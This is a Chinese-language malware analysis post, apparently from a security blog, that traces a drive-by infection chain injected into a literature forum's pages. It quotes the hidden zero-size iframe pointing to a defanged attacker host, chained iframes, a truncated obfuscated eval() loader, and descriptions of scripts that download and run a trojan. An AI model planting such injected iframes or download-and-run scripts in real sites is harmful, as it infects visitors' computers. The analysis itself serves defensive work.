某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt

简介: 某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt

Google了一下,发现Google已经标注了:该网站可能含有恶意软件,有可能会危害您的电脑。

检查论坛的网页代码,被加入:

/---
<iframe src='hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm' width=0 height=0>
---/
hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm 内容为:
/---
<iframe width='100' height='100' src='Webxl.htm'></iframe>
<iframe width='100' height='100' src='wm/wm1.htm'></iframe>
<iframe width='100' height='100' src='wm/wm2.htm'></iframe>
<iframe width='100' height='100' src='wm/vip.htm'></iframe>
<iframe width='100' height='100' src='wm/wm3.htm'></iframe>
---/

hxxp://a**aa.3*6**96**78.cn/Webxl.htm 未能打开。

hxxp://a**aa.3*6**96**78.cn/wm/vip.htm 用自定义函数解密 变量 loveVip 的值,其值为VBScript代码,功能是下载 vip.exe 并运行。

文件说明符 : D:/test/vip.exe

属性 : A---

获取文件版本信息大小失败!

创建时间 : 2007-8-17 21:20:8

修改时间 : 2007-8-17 21:20:10

访问时间 : 2007-8-17 0:0:0

大小 : 19107 字节 18.675 KB

MD5 : 8fe4a48341fb6fea12df42845db2d229

Kaspersky 报为 Trojan.Win32.Agent.avt,瑞星 报为 Worm.Win32.Agent.ipi

hxxp://a**aa.3*6**96**78.cn/wm/wm1.htm 未能打开。

hxxp://a**aa.3*6**96**78.cn/wm/wm2.htm 包含代码:

/---
<script src=000614.js></script>
---/
000614.js 内容为:
/---
eval("\146\165\156…(略)…\73\175")
---/

解密后为 JavaScript 脚本,功能下载 hxxp://d***dd.3*6**96**78.cn/window.exe。

window.exe 与 vip.exe 相同。

hxxp://a**aa.3*6**96**78.cn/wm/wm3.htm 包含JavaScript脚本,功能是检查名为 woshi07004 的 Cookies 是否存在,若不存在则创建,并运行 溢出代码。  


相关文章
|
2月前
|
安全 JavaScript 前端开发
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
|
2月前
|
缓存 算法 网络协议
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
|
2月前
|
安全 Shell
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
|
3月前
|
存储 人工智能
|
2天前
|
人工智能 算法 搜索推荐
清华校友用AI破解162个高数定理,智能体LeanAgent攻克困扰陶哲轩难题!
清华校友开发的LeanAgent智能体在数学推理领域取得重大突破,成功证明了162个未被人类证明的高等数学定理,涵盖抽象代数、代数拓扑等领域。LeanAgent采用“持续学习”框架,通过课程学习、动态数据库和渐进式训练,显著提升了数学定理证明的能力,为数学研究和教育提供了新的思路和方法。
9 3
|
3天前
|
人工智能 自然语言处理 算法
企业内训|AI/大模型/智能体的测评/评估技术-某电信运营商互联网研发中心
本课程是TsingtaoAI专为某电信运营商的互联网研发中心的AI算法工程师设计,已于近日在广州对客户团队完成交付。课程聚焦AI算法工程师在AI、大模型和智能体的测评/评估技术中的关键能力建设,深入探讨如何基于当前先进的AI、大模型与智能体技术,构建符合实际场景需求的科学测评体系。课程内容涵盖大模型及智能体的基础理论、测评集构建、评分标准、自动化与人工测评方法,以及特定垂直场景下的测评实战等方面。
22 4
|
15天前
|
人工智能 API 决策智能
swarm Agent框架入门指南:构建与编排多智能体系统的利器 | AI应用开发
Swarm是OpenAI在2024年10月12日宣布开源的一个实验性质的多智能体编排框架。其核心目标是让智能体之间的协调和执行变得更轻量级、更容易控制和测试。Swarm框架的主要特性包括轻量化、易于使用和高度可定制性,非常适合处理大量独立的功能和指令。【10月更文挑战第15天】
111 6
|
1月前
|
Python 机器学习/深度学习 人工智能
手把手教你从零开始构建并训练你的第一个强化学习智能体:深入浅出Agent项目实战,带你体验编程与AI结合的乐趣
【10月更文挑战第1天】本文通过构建一个简单的强化学习环境,演示了如何创建和训练智能体以完成特定任务。我们使用Python、OpenAI Gym和PyTorch搭建了一个基础的智能体,使其学会在CartPole-v1环境中保持杆子不倒。文中详细介绍了环境设置、神经网络构建及训练过程。此实战案例有助于理解智能体的工作原理及基本训练方法,为更复杂应用奠定基础。首先需安装必要库: ```bash pip install gym torch ``` 接着定义环境并与之交互,实现智能体的训练。通过多个回合的试错学习,智能体逐步优化其策略。这一过程虽从基础做起,但为后续研究提供了良好起点。
102 4
手把手教你从零开始构建并训练你的第一个强化学习智能体:深入浅出Agent项目实战,带你体验编程与AI结合的乐趣
|
1月前
|
机器学习/深度学习 人工智能 算法
打造你的超级Agent智能体——在虚拟迷宫中智斗未知,解锁AI进化之谜的惊心动魄之旅!
【10月更文挑战第5天】本文介绍了一个基于强化学习的Agent智能体项目实战,通过控制Agent在迷宫环境中找到出口来完成特定任务。文章详细描述了环境定义、Agent行为及Q-learning算法的实现。使用Python和OpenAI Gym框架搭建迷宫环境,并通过训练得到的Q-table测试Agent表现。此项目展示了构建智能体的基本要素,适合初学者理解Agent概念及其实现方法。
82 9
下一篇
无影云桌面